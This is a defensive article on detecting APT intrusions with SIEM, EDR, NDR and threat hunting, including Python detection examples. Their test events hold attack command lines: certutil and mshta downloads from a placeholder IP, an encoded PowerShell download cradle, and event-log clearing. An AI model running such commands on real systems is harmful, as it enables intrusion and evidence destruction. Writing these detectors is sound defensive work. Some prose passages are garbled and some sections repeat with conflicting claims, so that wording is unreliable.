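     "selection": {"CommandLine|contains": ["wevtutil.exe cl ", "wevtutil cl ", "clear-eventlog"]}},
]

# Allowlist of legitimate LOLBAS use in the same selection syntax. "patchagent.exe" is a
# hypothetical enterprise tool standing in for your own exceptions.
ALLOWLIST = [
    {"reason": "patch agent uses certutil to fetch signed updates",
     "selection": {"Image|endswith": "\\certutil.exe", "ParentImage|endswith": "\\patchagent.exe"}},
]

STANDARD_PORTS = {80, 443}


def _op(value, op, pattern):
    value, pattern = value.lower(), pattern.lower()
    if op == "contains":
        return pattern in value
    if op == "endswith":
        return value.endswith(pattern)
    if op == "startswith":
        return value.startswith(pattern)
    return value == pattern


def selection_matches(selection, event):
    """Evaluate a Sigma-like selection map against one event dict."""
    for key, patterns in selection.items():
        field, *mods = key.split("|")
        op = mods[0] if mods else "equals"
        need_all = "all" in mods[1:]
        value = str(event.get(field, ""))
        results = [_op(value, op, p) for p in (patterns if isinstance(patterns, list) else [patterns])]
        if not (all(results) if need_all else any(results)):
            return False
    return True


def run_rules(events, rules=RULES, allowlist=ALLOWLIST):
    """Match EID 1 process events, drop allowlisted ones, and escalate a match whose
    process (same ProcessGuid) also opened a connection to a non-standard port."""
    conns = defaultdict(list)
    for e in events:
        if e["EventID"] == 3:
            conns[e["ProcessGuid"]].append(e)
    alerts, suppressed = [], []
    for e in events:
        if e["EventID"] != 1:
            continue
        for rule in rules:
            if not selection_matches(rule["selection"], e):
                continue
            allowed = next((a for a in allowlist if selection_matches(a["selection"], e)), None)
            if allowed:
                suppressed.append({"rule": rule["title"], "reason": allowed["reason"], "host": e["Computer"]})
                continue
            odd = [c for c in conns[e["ProcessGuid"]] if c["DestinationPort"] not in STANDARD_PORTS]
            alerts.append({"rule": rule["title"], "tags": rule["tags"], "host": e["Computer"],
                           "level": "critical" if odd else rule["level"],
                           "network": [f'{c["DestinationIp"]}:{c["DestinationPort"]}' for c in odd],
                           "cmdline": e["CommandLine"]})
    return {"alerts": alerts, "suppressed": suppressed}


# Constructed Sysmon-shaped events (documentation IP range 203.0.113.0/24).
EVENTS = [
    {"EventID": 1, "Computer": "WS-0417", "ProcessGuid": "G1", "Image": "C:\\Windows\\System32\\certutil.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "certutil -urlcache -split -f http://203.0.113.7:8080/a.txt C:\\ProgramData\\a.exe"},
    {"EventID": 3, "Computer": "WS-0417", "ProcessGuid": "G1", "DestinationIp": "203.0.113.7", "DestinationPort": 8080},
    {"EventID": 1, "Computer": "WS-0099", "ProcessGuid": "G2", "Image": "C:\\Windows\\System32\\certutil.exe",
     "ParentImage": "C:\\Program Files\\PatchAgent\\patchagent.exe",
     "CommandLine": "certutil -urlcache -split -f https://updates.example.com/kb.cab C:\\Windows\\Temp\\kb.cab"},
    {"EventID": 1, "Computer": "WS-0417", "ProcessGuid": "G3", "Image": "C:\\Windows\\System32\\schtasks.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "schtasks /create /tn Update /tr C:\\ProgramData\\update.ps1 /sc minute /mo 10"},
    {"EventID": 1, "Computer": "WS-0417", "ProcessGuid": "G4", "Image": "C:\\Windows\\System32\\wevtutil.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "wevtutil.exe cl Security"},
    {"EventID": 1, "Computer": "WS-0417", "ProcessGuid": "G5", "Image": "C:\\Windows\\System32\\mshta.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "mshta https://203.0.113.7/p.hta"},
    {"EventID": 1, "Computer": "ADM-01", "ProcessGuid": "G6", "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "wmic csproduct get uuid"},   # benign inventory
]


if __name__ == "__main__":
    result = run_rules(EVENTS)
    for a in result["alerts"]:
        print(a["level"].upper(), a["host"], a["rule"], a["network"], a["tags"])
    for s in result["suppressed"]:
        print("suppressed:", s)
```

Keeping the allowlist in the same syntax as the rules means exceptions are reviewed and version-controlled like rules, which is the Detection-as-Code discipline; the trade-off is that an allowlist keyed on a parent image is bypassed by an attacker who launches certutil from that same parent, so exceptions should be as narrow as the telemetry allows (parent path, user, destination host), not just a process name.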
Honeypots and deception technology: force the attacker to reveal himself
Deception technology is the one class of tools where an alert needs almost no triage: no legitimate user has a reason to touch a trap, so whoever interacts with it is an attacker or an insider. The practical exception is your own vulnerability scanners and inventory tools, which must be excluded before deployment or they will be the first to trip the wire. Honeypot servers, fake accounts and canary files create a minefield for an attacker who is already inside the perimeter.
The new generation of honeypot is the LLM decoy, capable of imitating realistic services on all 65535 ports. The language model generates plausible responses for any protocol, keeping the attacker engaged and collecting TTPs. This is radically different from the classic honeypot, which needed a separate image for every emulated service. One LLM honeypot instead of a zoo of dozens of images is a serious step forward.
A practical guide to deploying an LLM decoy for the SOC: LLM Honeypot: building bait based on the language model for monitoring all 65535 ports
MITRE ATT&CK as the language of threat hunting: from matrix to detection surface
MITRE ATT&CK is not an academic directory but a working tool for SOC analysts. Each technique in the matrix is a concrete detection case: which data source is needed, which pattern to look for, which tools can detect it. SOC maturity is measured not by the number of alerts but by the percentage of MITRE ATT&CK coverage.
SOC maturity matrix

Key techniques to cover first, based on threat reports for 2024-2025:
• T1190 - Exploit Public-Facing Application (38% of initial access per M-Trends)
• T1078 - Valid Accounts (71% growth per IBM X-Force)
• T1071 - Application Layer Protocol (C2 over HTTPS/DNS)
• T1003 - OS Credential Dumping (prerequisite for lateral movement)
• T1055 - Process Injection (the main evasion technique)
Every vendor platform (CrowdStrike, SentinelOne, Elastic) declares a percentage of MITRE ATT&CK coverage. But declared coverage and real detection are different things. Coverage means the platform can collect telemetry for a technique. Detection means you have a tuned rule that turns that telemetry into an alert. The difference between the two is the work of your SOC engineer.
AI and ML in the SOC: from 4,500 alerts to dozens of priority cases
Generative AI transforms both sides of the conflict. According to IBM X-Force, generating phishing emails with GenAI is 11.4 times faster at comparable quality. CrowdStrike recorded a doubling of malicious GenAI use for social engineering in 2024. Attackers automate the reconnaissance and initial access phases.
SOC teams answer with ML scoring of alerts: supervised learning identifies known patterns (improved signatures, in essence), unsupervised learning detects anomalies (zero-day behavior). Stellar Cyber Open XDR claims a 50-60% reduction in the false positive rate through multi-layer AI. The practical result: the L1 analyst receives not 4,500 raw alerts but 30-50 prioritized cases with context.
But AI scoring does not replace analysts. Organizational context is what ML cannot take into account. A PowerShell script at 2:00 am on an IT administrator's host is normal work. The same script on a marketer's host is a red flag. Only a person who works with the specific infrastructure knows this context.
A detailed analysis of ML approaches in the SOC with real metrics: Machine Learning in Cybersecurity: How ML-scoring Reduces SOC Triage
Practical stack: what to deploy depending on SOC maturity
The choice of tools depends on budget, team size and current maturity level. There is no universal stack; there is a decision tree.
Stack by team size

When to buy MDR instead of hiring
Managed Detection and Response (MDR), outsourced detection and response, is economically justified when the cost of hiring and retaining L2-L3 analysts exceeds the price of the MDR service. For a team of 1-3 people, an MDR provider (UnderDefense, CrowdStrike OverWatch, Arctic Wolf) covers the night shifts and gives access to expertise that cannot be hired on the market.
The MDR limitation: the provider does not know your infrastructure the way an internal team does. The first 30 days are an onboarding period with a high number of false escalations. Be prepared for that.
Data sources for APT detection: what to collect and why
Detecting targeted attacks starts not with tools but with data sources. If the SIEM does not receive the right logs, no correlation rule will help.

Key logging is required by OWASP A09:2021 (Security Logging and Monitoring Failures): without logging and monitoring, a compromise cannot be detected. Auditable events must be logged, alerts must be generated, and logs must be analyzed. Breaking any of these conditions creates a blind spot for an APT.
Where APT detection is heading in 2026-2027
Three trends will define APT detection in the coming years.
AI-native detection will replace AI-assisted. The difference is fundamental: in AI-assisted, ML supplements the existing rules; in AI-native, ML is the main detection engine and rules are used for validation. Next-generation platforms will build attack storylines automatically, correlating endpoint, network and identity telemetry through graph ML without manually written rules.
Detection-as-Code will become the standard. Sigma rules versioned in Git, tested through CI/CD and deployed to any SIEM: mature SOC teams already work this way. In 2026-2027 it will become a baseline requirement. The Sigma + YARA + osquery bundle gives a portable, vendor-independent detection stack.
Identity-centric security will replace perimeter-centric. With 79% of attacks malware-free and 71% growth in credential-based attacks, the detection focus shifts from "what is running on the host" to "who is doing what, and why it is abnormal". UEBA, behavioral analysis and continuous authentication are not options but mandatory components of the SOC stack.
Most SOC teams I have watched in recent years make the same mistake: they buy tools instead of building a process. The organization puts CrowdStrike on endpoints, connects Splunk, deploys NDR, and believes it is protected from APT. Six months later it turns out that the EDR agent is on 80% of hosts (the remaining 20% are Linux servers that were "forgotten" during rollout), the SIEM rules are the defaults, and nobody understands the NDR alerts because the L1 analyst does not know what "anomalous beacon pattern" means.
Tools are multipliers. Multiply them by zero process and you get zero detection. I have seen a SOC of two people with Elastic and well-written Sigma rules catch lateral movement in 15 minutes. And I have seen a SOC of twenty people with an enterprise stack worth millions of dollars, where a Cobalt Strike beacon lived on the network for a month because the alert drowned in the stream of four thousand daily false positives.
In the next two years there will be a sharp polarization. Teams that invest in detection engineering, writing, testing and iterating detection rules as code, will catch APTs at early stages of the kill chain. Teams that keep relying on vendor defaults and marketing promises of "AI-powered detection" will learn about the compromise from the news. The market for AI-native SOC platforms is growing, but the technology will not replace an engineer who understands why a specific PowerShell script on a specific host at a specific time is a red flag rather than routine automation. Each team makes the choice between these two paths today, not when the attacker is already inside.
Before dismantling detection tools, it is necessary to understand the motivation. APT-group is not an accidental hacker with ransomware-tuliki. For advanced threat threat is a long-term operation with a specific purpose: industrial espionage, preparation for sabotaging critical infrastructure or intellectual property theft. The financial impact goes far beyond direct losses.
The key difference between APT and mass campaigns is that at each stage of kill chain, attackers adapt to the victim’s specific infrastructure. They study which SIEM rules are customized, which EDR-agents stand on the hosts, where there are holes in network monitoring. According to IBM X-Force, in 2024, the growth of real-data attacks was 71% year-on-year. Attackers prefer not to hack, but to enter through the front door. Technique Valid Accounts (T1078) covers four tactics of MITRE ATT&CK: Initial Access, Persistence, Privilege Escalation and Defense Evasion.
That is why Detection of APT attacks does not boil down to one product. We need a coordinated work of several layers - endpoint, network, identity - with a single correlation and proactive threat hunt.
Detailed analysis of motivation and tactics of modern APT-groups with AI-automation - in our guide: AI Ransomware 2026: the Tactics from the M-Trends and Arctic Wolf reports for the pentesters
SIEM to detect threats: why 4500 aerets per day paralyze SOC
SIEM is the central nervous node of SOC. Splunk Enterprise Security, Microsoft Sentinel, MaxPatrol SIEM - they all aggregate logs from dozens of sources and apply correlation rules to detect attack chains. The problem is not the lack of data, but in its volume: a typical corporate SIEM generates more than 4500 alerts daily. To clean this up manually is the path to burnout by analysts and missed incidents.
What SIEM sees and what doesn't
SIEM is good for detecting by known patterns: mass input from one account to different hosts (Lateral Movement), creating a planning planner with a suspicious way (schtasks /create /tn Update /tr C:\ProgramData\update.ps1), cleaning the journals of events through wevtutil cl Security or Clear-EventLog (T1070.001) Correlation of Windows Security Event ID 4624 (successful input) + Event ID 4698 (shator creation) + outgoing connection to a newly registered domain - the basic detection scenario of the screen persist + C2-channel.
The Blind SIEM zone is attacks that do not generate characteristic logs. If the attacker uses Powershell.exe (T1059.001) with obfuscation (T1027) and connects to the legitimate cloud service (Google Sheets, OneDrive) instead of a dedicated C2-server, the standard correlation rules will not work. For such scenarios, custom Sigma rules are needed, tied to specific cloud APIs.
Checklist: 5 signs that your SIEM does not detect APT
1. There are no correlation rules for the living-off-the-land technician (PowerShell, WMI, MSHTA)
2. DNS logs do not correlate with Threat Intelligence feeds (MISP, OpenCTI)
3. There is no monitoring of accesses to cloud APIs (OneDrive, Google Drive, Slack) for C2 communications
4. The rules are triggered only on IOC (hashes, IP), but not on IOA (behavioral anomalies)
5. No automatic enrichment of alerts context from EDR-telemetry
If you scored 3+ points, your SIEM is actually blind to targeted attacks. It's time to rewrite the rules.
Detailed Sigma-rules for detecting cloud C2 channels: APT Detecting Through Cloud C2 Channels: Sigma and YARA Rules for Google Sheets, OneDrive and Slack
Sigma detectives for network equipment, including an ethyl-conveal via NETCONF: Sigma Detection Rules Cisco SD-WAN
EDR protection against APT: endpoint telemetry as the foundation of detection
EDR (Crowd Strike Falcon, SentinelOne Singularity, Elastic Security) is the first detection line at the endpoint level. The agent on the host records the start of processes, network connections, file modifications and registry, DLL boot. This telemetry is critical for detecting techniques that SIEM simply won’t see: Process Injection (T1055), OS Credential Dumping (T1003), disconnection of protective equipment (T1562.001)
Vendor-specific: where the detector breaks
Not all EDRs are the same – and it’s not marketing, but an architectural reality.

The architecture of telemetry collection determines what EDR techniques see. Agents based on user-mode hooks are vulnerable to bypass through direct/indirect syscals. Agents with kernel-level ETW-TI (CrowdStrike, Elastic 8.x+) detect these bypasses, but have restrictions on Linux hosts, where eBPF-based monitoring does not cover all system calls. I saw situations where an eBPF agent was missing a whole class of syscals on old cores - and in the megows of silence, while the attacker quietly gets the creeds.
Detailed analysis of the architecture of Linux-agents with a map of blind zones: Linux EDR from the inside: how agents collect telemetry and where they have blind spots
Restrictions of EDR, which are rarely discussed
EDR does not see network traffic between hosts that do not have an agent (printers, IoT, network equipment). EDR does not detect DNS tunneling - this requires NDR. EDR is powerless if the attacker uses exclusively valid credentials and standard administration tools without triggering suspicious processes.
EDR - necessary, but not sufficient layer. One.
NDR and Network Threat Detection: What Only Traffic Sees
Network Detection and Response closes the fundamental gap: everything that passes through the network, but leaves no traces on endpoints. NDR solutions (Darktrace, Vectra AI, PT Network Attack Discovery) analyze network traffic in real time, revealing anomalies by behavioral analysis and machine learning methods.
3 scenarios where NDRs are indispensable
Scenario 1: C2 through Application Layer Protocol (T1071). The attacker masks command traffic under HTTPS appeals to legitimate services. EDR only sees the process that initiated the connection. NDR analyzes the traffic pattern: the frequency of bacon intervals, the volume of data transmitted, JA3/JA4 TLS-find prints. Abnormal beacon with an interval of 60 seconds to the IP in ANS, not related to the stated service, is a classic NDR detect.
Scenario 2: Lateral Movement via SMB/RDP without malvarium. The attacker uses PsExec or standard RDP with stolen creeds, EDR on a target host may not see anomalies - legitimate processes. NDR fixes an uncharacteristic pattern: the accountant's workpaper is connected via SMB to the domain controller at 3:00, transmitting 2 GB of data. The accountant at three nights downloads 2 giga with DC - here and without ML it is clear that something is wrong.
Scenario 3: Extilting through DNS tunnels. The data is encoded in the subdomains of requests to a controlled attacking domain. On the host, it looks like regular DNS queries. NDR detects an anomaly: thousands of requests for subdomains with randomized names, high entropy of rows, an uncharacteristic volume of DNS traffic from one host.
Exotic exfiltration channels go beyond the network - a detailed analysis of stagnographic techniques: Steganography in audio files: how the nuqar is hidden inside WAV and how to detect it
SIEM EDR NDR integration: why XDR is not marketing, but a necessity
Isolated tools generate a fragmented picture. SIEM sees the logs, EDR - processes on hosts, NDR - network anomalies. The real chain of APT attacks goes through all three layers at the same time, and the correlation between them is the only way to distinguish true positive from noise.
Example of end-to-end correlation
Here’s what the APT operation detects when all three layers work together:
1. NDR detects an anomalous HTTPS-beacon to IP in AS owned by a bulletproof host, with a frequency of 45 seconds
2. EDR (Crowd Strike Falcon) on the original host shows: powershell.exeLaunched with -EncodedCommand, parental process - winword.exe(phishing document)
3. SIEM (Splunk) correlates: 10 minutes before the launch of PowerShell, the mail gateway recorded an incoming letter with an attachment. XLSM from a newly registered domain
4. SIEM enriches the event with data from MISP: the sender domain coincides with the IOC from the recent TI-report
5. Automatic reaction : host insulation via EDR API, IP locking on perimeter firewall
Without a bundle of three layers, each individual altrate is a low-priority: “suspicious PowerShell” (thousands per day), “unusual HTTPS traffic” (hundreds per day), “letter with a macro” (tenses per day). Together - a confirmed incident with a complete chain of attack.
XDR (Extended Detection and Response) formalizes this integration. CrowdStrike Falcon XDR, Microsoft Defender XDR, Palo Alto Cortex XDR combine telemetry from the end, network, identity, and cloud into a single data lake with cross-domain correlation. An open alternative is the Elastic Security + Zeek + Sigma stack, where the correlation is built on the Detection-as-Code approach. Cheaper, more flexible, but requires hands and heads.
Threat Hunting Methodology: 3 Approaches to Threat Hunting in 2026
Threat Hunting is the proactive search for threats that are already present in the infrastructure but have not been detected by automated means. If SIEM and EDR answer the question "what is happening right now", Threat Hunting answers "what have we missed in the last 30 days".
Unstructured Hunting: Intuition of Analyst
An exploratory search driven by experience. The analyst notices an anomaly in the data and follows it. Example: an unusually high volume of outgoing DNS traffic from one host outside working hours. No rule fires on it, but an experienced SOC analyst knows that this is what DNS tunneling looks like. This intuition is hard to formalize as a rule, yet it is what catches what the machines miss.
Situational Hunting: Driven by Context
Tied to a specific event: publication of a new CVE, a report on an APT group campaign, discovery of an IOC in a TI feed. The analyst takes the indicators from the report and checks whether they appear in historical SIEM/EDR data.
Tools for all three approaches: APT-Hunter (maps findings in Windows Event Logs to MITRE ATT&CK), MISP/OpenCTI (IOC exchange and enrichment), Zeek (deep network traffic analysis), YARA (signature matching in files and memory), Sigma (vendor-neutral detection rule format, compiled into the query language of a specific SIEM). Each of them is open source, and each covers a specific niche of the hunt.
How ML scoring transforms the triage process, from thousands of alerts to dozens of prioritized cases: Machine learning in cybersecurity: how ML scoring has reduced SOC triage from thousands of alerts to tens
Identity-based attacks and Valid Accounts: the main vector of 2026
IBM X-Force data is unambiguous: attacks using valid credentials grew 71% year-on-year. This is not a trend but a fundamental shift in the tactics of APT groups. Why exploit vulnerabilities and risk EDR detection if you can buy stolen credentials on the underground market and log in legitimately?
The Valid Accounts technique (T1078) is one of the hardest to detect, because from the point of view of SIEM and EDR an ordinary user is logging in. Detection relies on behavioral anomalies:

UEBA (User and Entity Behavior Analytics) is the key component for detecting identity-based attacks. Exabeam Fusion, for example, builds a profile of normal behavior for each user and assigns a risk score to deviations. But UEBA is useless without good baseline data: the first 2-3 weeks after deployment are the learning period, during which the system generates false positives. Patience here is part of the process.
A complete analysis of identity-based techniques with Sigma detection rules: Identity-based attacks: how attackers use legitimate accounts and how to detect them
Detecting lateral movement: 62 minutes to stop the attack
After initial access, the APT group begins moving laterally. According to CrowdStrike, the average time from initial access to the first lateral movement is 62 minutes. This is the window in which the SOC team must detect and block the attacker. Miss it, and everything that follows is harder.
Lateral movement is one of the most detectable phases of an APT operation if the tooling is configured correctly. Attackers use PsExec, WMI, RDP and SMB, and each of these protocols leaves characteristic artifacts.
Detection by kill chain position
Initial Access → Lateral Movement:
• Sysmon Event ID 3 (Network Connection) on the source host: outgoing connection to port 445 (SMB), 135 (WMI) or 3389 (RDP) on a host this workstation has never communicated with before
• Windows Security Event ID 4624 (Logon Type 3, Network) on the target host: logon with an account that has not previously been used on this host
• NDR: a spike of SMB traffic from one source to several targets in a short interval, the pattern of network scanning
Lateral Movement → Data Collection:
• EDR: launch of rar.exe or 7z.exe with password-based encryption (-hp), parent process cmd.exe started via PsExec
• SIEM: correlation of data archiving + abnormal outgoing traffic to an external IP
79% of attacks in 2024 involved no malware: attackers moved exclusively with standard tools. Detecting lateral movement through legitimate accounts requires behavioral analysis, not signatures. Signatures are useless here.
A detailed guide with Sigma rules for detecting lateral movement without malicious code: Detecting lateral movement through trusted accounts: catching horizontal movement without malicious code
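An added example (not the article's code) that serves both the Valid Accounts passage above and this kill-chain list: a first-seen baseline is built from constructed 30-day history, then the Sysmon Event ID 3 "new peer" and 4624 Logon Type 3 "account never used from this source to this host" detections and the SMB fan-out pattern are applied to one day of events. Hostnames, the svc_backup account, the 60-second window and the fan-out threshold are assumptions.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

T0 = datetime(2026, 1, 15, 2, 10, 0)   # constructed: the fan-out starts at night


def sysmon3(ts, src, dst, port):
    """Minimal Sysmon Event ID 3 record (network connection)."""
    return {"source": "sysmon3", "ts": ts, "src": src, "dst": dst, "dport": port}


def sec4624(ts, dst, account, src, logon_type=3):
    """Minimal Security Event ID 4624 record on the target host."""
    return {"source": "sec4624", "ts": ts, "dst": dst, "account": account,
            "src": src, "logon_type": logon_type}


# Constructed 30-day history: what "normal" looks like for these hosts and accounts.
HISTORY = (
    [sysmon3(T0 - timedelta(days=d), "WS-0421", "FS01", 445) for d in range(1, 31)]
    + [sysmon3(T0 - timedelta(days=d), "WS-0421", "DC01", 135) for d in range(1, 31)]
    + [sysmon3(T0 - timedelta(days=d), "BK01", h, 445) for d in range(1, 31) for h in ("FS01", "FS02")]
    + [sec4624(T0 - timedelta(days=d), "FS01", "j.doe", "WS-0421") for d in range(1, 31)]
    + [sec4624(T0 - timedelta(days=d), h, "svc_backup", "BK01") for d in range(1, 31) for h in ("FS01", "FS02")]
)

# Constructed current-day telemetry: one benign session, then a fan-out from
# WS-0421 using the backup service account (a valid but stolen credential).
TARGETS = ["FS01", "FS02", "FS03", "FS04", "FS05", "APP01", "APP02", "DB01"]
TODAY = (
    [sysmon3(T0 - timedelta(hours=5), "WS-0421", "FS01", 445),
     sec4624(T0 - timedelta(hours=5), "FS01", "j.doe", "WS-0421")]
    + [sysmon3(T0 + timedelta(seconds=3 * i), "WS-0421", h, 445) for i, h in enumerate(TARGETS)]
    + [sec4624(T0 + timedelta(seconds=3 * i + 1), h, "svc_backup", "WS-0421")
       for i, h in enumerate(TARGETS) if h in ("FS01", "FS03", "DB01")]
)


def build_baseline(history):
    """First-seen sets: network peers (src, dst, port) and network logons
    (account, source host, target host) over the history window."""
    peers = {(e["src"], e["dst"], e["dport"]) for e in history if e["source"] == "sysmon3"}
    logons = {(e["account"], e["src"], e["dst"])
              for e in history if e["source"] == "sec4624" and e["logon_type"] == 3}
    return {"peers": peers, "logons": logons}


def detect_lateral(baseline, events, fanout_threshold=5, fanout_window=timedelta(seconds=60)):
    """Flag first-seen peers and logon triples, plus SMB fan-out from one source."""
    alerts = []
    smb_by_src = defaultdict(list)
    for e in events:
        if e["source"] == "sysmon3":
            if (e["src"], e["dst"], e["dport"]) not in baseline["peers"]:
                alerts.append({"type": "new_peer", "src": e["src"], "dst": e["dst"],
                               "dport": e["dport"], "ts": e["ts"]})
            if e["dport"] == 445:
                smb_by_src[e["src"]].append(e)
        elif e["source"] == "sec4624" and e["logon_type"] == 3:
            if (e["account"], e["src"], e["dst"]) not in baseline["logons"]:
                alerts.append({"type": "new_logon", "account": e["account"], "src": e["src"],
                               "dst": e["dst"], "ts": e["ts"]})
    # SMB fan-out: one source touching many distinct targets inside a short window.
    for src, evs in smb_by_src.items():
        evs.sort(key=lambda e: e["ts"])
        best = 0
        for i, first in enumerate(evs):
            targets = {e["dst"] for e in evs[i:] if e["ts"] - first["ts"] <= fanout_window}
            best = max(best, len(targets))
        if best >= fanout_threshold:
            alerts.append({"type": "smb_fanout", "src": src, "targets": best})
    return alerts


def summarize(alerts):
    """Alert counts by type, handy for a quick look at the day's result."""
    return dict(Counter(a["type"] for a in alerts))


if __name__ == "__main__":
    print(summarize(detect_lateral(build_baseline(HISTORY), TODAY)))
```

The baseline key for logons deliberately includes the source host: svc_backup logging on to FS01 is normal from the backup server and abnormal from a workstation, which is exactly the distinction a signature cannot express but a first-seen baseline can.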
Living off the Land and evasion techniques: why standard detections break down
Living off the Land (LotL) is the use of legitimate system tools for malicious activity. powershell.exe, certutil.exe, mshta.exe, wmic.exe: all are standard Windows components that cannot simply be blocked in a corporate environment. The LOLBAS catalog (Living Off The Land Binaries and Scripts) lists dozens of such utilities with their specific malicious use cases. certutil.exe maps to techniques T1027.013 (Encrypted/Encoded File), T1105 (Ingress Tool Transfer), T1140 (Deobfuscate/Decode Files or Information) and T1564.004 (NTFS File Attributes); mshta.exe to T1105 and T1218.005 (Mshta); wmic.exe to T1047 (Windows Management Instrumentation) and T1218 (System Binary Proxy Execution).
APT groups combine LotL with evasion techniques:
• Obfuscated Files or Information (T1027): PowerShell scripts are Base64-encoded or use string obfuscation to bypass signature analysis
• Process Injection (T1055): code is injected into a legitimate process (explorer.exe, svchost.exe), hiding malicious activity from EDR
• Disable or Modify Tools (T1562.001): the attacker disables or modifies the EDR agent, Sysmon or Windows Defender
A recent example: in May 2026 Microsoft Threat Intelligence published a technical analysis of the Go-based ransomware "The Gentlemen", deployed by affiliates of the group Storm-2697. The encryptor combines per-file ephemeral encryption with aggressive self-propagation through standard Windows mechanisms. Pure LotL in action.
Checklist for detecting LotL techniques
1. Enable PowerShell logging (Module Logging, Script Block Logging, Transcription)
2. Configure Sysmon with the SwiftOnSecurity or ION-Storm configuration to monitor LOLBAS binaries
3. Build an allowlist of legitimate uses of certutil.exe, mshta.exe and wmic.exe and alert on deviations from it
4. Monitor Event ID 4688 (Process Creation) with command-line arguments; this requires the extended audit policy that includes the command line in process creation events
5. Correlate LOLBAS binary launch + network connection to a non-standard port = high priority
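An added example for the checklist, not code from the page: a small hunt over constructed 4688/Sysmon-style process events and network connections that applies an allowlist (step 3), tags LOLBAS command lines with the technique IDs listed in this section, decodes a PowerShell -EncodedCommand payload, and raises the priority when the same process opens a connection to a non-standard port within a minute (step 5). The allowlist entries, hostnames, the 203.0.113.7 address and the 60-second window are assumptions.

```python
import base64
import re
from datetime import datetime, timedelta

T0 = datetime(2026, 1, 15, 14, 0, 0)   # constructed anchor time
STANDARD_PORTS = {80, 443, 53}

# Abuse patterns tied to the ATT&CK techniques named in this section.
LOLBAS_PATTERNS = [
    ("certutil.exe", re.compile(r"-urlcache|-decode|-encode", re.I), ["T1105", "T1140"]),
    ("mshta.exe", re.compile(r"https?://|javascript:|vbscript:", re.I), ["T1218.005", "T1105"]),
    ("wmic.exe", re.compile(r"process\s+call\s+create|/node:", re.I), ["T1047", "T1218"]),
    ("powershell.exe", re.compile(r"-e(nc(odedcommand)?)?\b|-nop\b.*-w\s+hidden", re.I), ["T1027"]),
]
# Hypothetical allowlist: documented legitimate use in this (assumed) environment.
ALLOWLIST = [
    ("certutil.exe", re.compile(r"-verify\s+.*\.cer$", re.I)),    # PKI team checks certificates
    ("wmic.exe", re.compile(r"^wmic\.exe\s+os\s+get\b", re.I)),   # inventory script
]

# Constructed payload and events. The C2 address is a documentation-range placeholder.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7:8443/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
PROC_EVENTS = [
    {"ts": T0, "host": "WS-0421", "pid": 4120, "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -EncodedCommand {ENCODED}"},
    {"ts": T0 + timedelta(minutes=1), "host": "WS-0421", "pid": 4188, "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.7:8443/t.txt C:\\Users\\Public\\t.txt"},
    {"ts": T0 + timedelta(minutes=2), "host": "SRV-PKI01", "pid": 900, "image": "certutil.exe",
     "cmdline": "certutil.exe -verify C:\\certs\\web.cer"},
    {"ts": T0 + timedelta(minutes=3), "host": "WS-0777", "pid": 3001, "image": "mshta.exe",
     "cmdline": "mshta.exe http://203.0.113.7/launch.hta"},
    {"ts": T0 + timedelta(minutes=4), "host": "SRV-ADM01", "pid": 2222, "image": "wmic.exe",
     "cmdline": "wmic.exe os get caption,version"},
]
NET_EVENTS = [
    {"ts": T0 + timedelta(seconds=5), "host": "WS-0421", "pid": 4120, "dst": "203.0.113.7", "dport": 8443},
    {"ts": T0 + timedelta(minutes=1, seconds=2), "host": "WS-0421", "pid": 4188, "dst": "203.0.113.7", "dport": 8443},
    {"ts": T0 + timedelta(minutes=3, seconds=1), "host": "WS-0777", "pid": 3001, "dst": "203.0.113.7", "dport": 80},
]


def decode_encoded_command(cmdline):
    """Plaintext of a PowerShell -EncodedCommand (base64 of UTF-16LE), or None."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(proc):
    """Technique IDs matched by the command line; [] if allowlisted or benign."""
    image, cmd = proc["image"].lower(), proc["cmdline"]
    for img, pat in ALLOWLIST:
        if image == img and pat.search(cmd):
            return []            # documented legitimate use, checked first
    techniques = []
    for img, pat, ids in LOLBAS_PATTERNS:
        if image == img and pat.search(cmd):
            techniques += ids
    return techniques


def hunt_lolbas(proc_events, net_events, window=timedelta(seconds=60)):
    """Step 5: a LOLBAS launch followed by a connection from the same process to a
    port outside STANDARD_PORTS is escalated to high priority."""
    findings = []
    for p in proc_events:
        techniques = classify(p)
        if not techniques:
            continue
        odd_ports = sorted({n["dport"] for n in net_events
                            if n["host"] == p["host"] and n["pid"] == p["pid"]
                            and timedelta(0) <= n["ts"] - p["ts"] <= window
                            and n["dport"] not in STANDARD_PORTS})
        findings.append({"host": p["host"], "image": p["image"], "techniques": techniques,
                         "decoded": decode_encoded_command(p["cmdline"]),
                         "nonstandard_ports": odd_ports,
                         "priority": "high" if odd_ports else "medium"})
    return findings


if __name__ == "__main__":
    for finding in hunt_lolbas(PROC_EVENTS, NET_EVENTS):
        print(finding)
```

Decoding -EncodedCommand is worth doing at triage time: the base64 blob itself tells the analyst nothing, while the decoded script usually carries the download URL. Note that the allowlist is matched before the LOLBAS patterns, so an overly broad entry silently hides abuse; keep each entry as narrow as the documented use.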
Honeypot technologies and deception: make the attacker reveal himself
Deception technology is the only class of tools where false positives are impossible by design: if someone interacts with a trap, it is an attacker or an insider, and there is no third option (provided your own vulnerability scanners and inventory jobs are excluded from touching the traps). Honeypot servers, fake accounts and canary files create a minefield for an attacker who has already penetrated the perimeter.
The new generation of honeypots is the LLM honeypot, capable of imitating realistic services on all 65535 ports. The language model generates plausible responses for any protocol, keeping the attacker engaged and collecting TTPs. This is radically different from the classic honeypot, which required a separate image for every simulated service. One LLM honeypot instead of a zoo of dozens of images is a serious step forward.
A practical guide to deploying an LLM honeypot for the SOC: LLM Honeypot: building a language-model-based decoy for monitoring all 65535 ports
MITRE ATT&CK as the language of threat hunting: from matrix to detection surface
